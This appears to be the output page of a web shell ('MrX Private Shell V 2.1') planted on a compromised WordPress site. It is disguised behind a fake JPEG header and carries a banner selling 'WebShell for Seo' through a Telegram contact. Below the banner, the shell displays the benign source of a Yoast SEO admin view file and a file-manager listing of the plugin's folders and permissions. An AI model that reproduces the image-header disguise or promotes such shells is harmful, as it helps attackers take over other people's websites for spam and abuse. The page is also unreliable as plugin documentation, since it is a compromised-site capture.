����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* WPSEO plugin file.
*
* @package WPSEO\Admin\Views
*/
if ( ! defined( 'WPSEO_VERSION' ) ) {
header( 'Status: 403 Forbidden' );
header( 'HTTP/1.1 403 Forbidden' );
exit();
}
if ( ! \current_theme_supports( 'title-tag' ) && ! ( function_exists( 'wp_is_block_theme' ) && \wp_is_block_theme() ) ) {
$wpseo_rewrite_titles_title = esc_html__( 'Rewrite titles', 'wordpress-seo' );
$wpseo_rewrite_titles_presenter = new WPSEO_Paper_Presenter(
$wpseo_rewrite_titles_title,
__DIR__ . '/paper-content/general/force-rewrite-title.php',
[
'collapsible' => true,
'expanded' => true,
'paper_id' => 'settings-general-rewrite-titles',
'title' => $wpseo_rewrite_titles_title,
'class' => 'search-appearance',
]
);
// phpcs:ignore WordPress.Security.EscapeOutput -- output contains HTML and we assume it's properly escape on object creation.
echo $wpseo_rewrite_titles_presenter->get_output();
}
$wpseo_title_separator_title = esc_html__( 'Title Separator', 'wordpress-seo' );
$wpseo_title_separator_presenter = new WPSEO_Paper_Presenter(
$wpseo_title_separator_title,
__DIR__ . '/paper-content/general/title-separator.php',
[
'collapsible' => true,
'expanded' => true,
'paper_id' => 'settings-general-title-separator',
'title' => $wpseo_title_separator_title,
'class' => 'search-appearance',
]
);
// phpcs:ignore WordPress.Security.EscapeOutput -- output contains HTML and we assume it's properly escape on object creation.
echo $wpseo_title_separator_presenter->get_output();
if ( get_option( 'show_on_front' ) === 'posts' ) {
$wpseo_homepage_title = esc_html__( 'Homepage', 'wordpress-seo' );
}
else {
$wpseo_homepage_title = esc_html__( 'Homepage & Posts page', 'wordpress-seo' );
}
$wpseo_homepage_presenter = new WPSEO_Paper_Presenter(
$wpseo_homepage_title,
__DIR__ . '/paper-content/general/homepage.php',
[
'collapsible' => true,
'expanded' => true,
'paper_id' => 'settings-general-homepage',
'title' => $wpseo_homepage_title,
'class' => 'search-appearance',
]
);
// phpcs:ignore WordPress.Security.EscapeOutput -- output contains HTML and we assume it's properly escape on object creation.
echo $wpseo_homepage_presenter->get_output();
$wpseo_knowledge_graph_title = esc_html__( 'Knowledge Graph & Schema.org', 'wordpress-seo' );
$wpseo_knowledge_graph_presenter = new WPSEO_Paper_Presenter(
$wpseo_knowledge_graph_title,
__DIR__ . '/paper-content/general/knowledge-graph.php',
[
'collapsible' => true,
'expanded' => true,
'paper_id' => 'settings-general-knowledge-graph',
'title' => $wpseo_knowledge_graph_title,
'class' => 'search-appearance',
]
);
// phpcs:ignore WordPress.Security.EscapeOutput -- output contains HTML and we assume it's properly escape on object creation.
echo $wpseo_knowledge_graph_presenter->get_output();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| archives | Folder | 0755 |
|
|
| paper-content | Folder | 0755 |
|
|
| taxonomies | Folder | 0755 |
|
|
| archives.php | File | 2.1 KB | 0644 |
|
| breadcrumbs.php | File | 582 B | 0644 |
|
| general.php | File | 2.84 KB | 0644 |
|
| media.php | File | 1.14 KB | 0644 |
|
| post-types.php | File | 2.52 KB | 0644 |
|
| rss.php | File | 1023 B | 0644 |
|
| taxonomies.php | File | 2.08 KB | 0644 |
|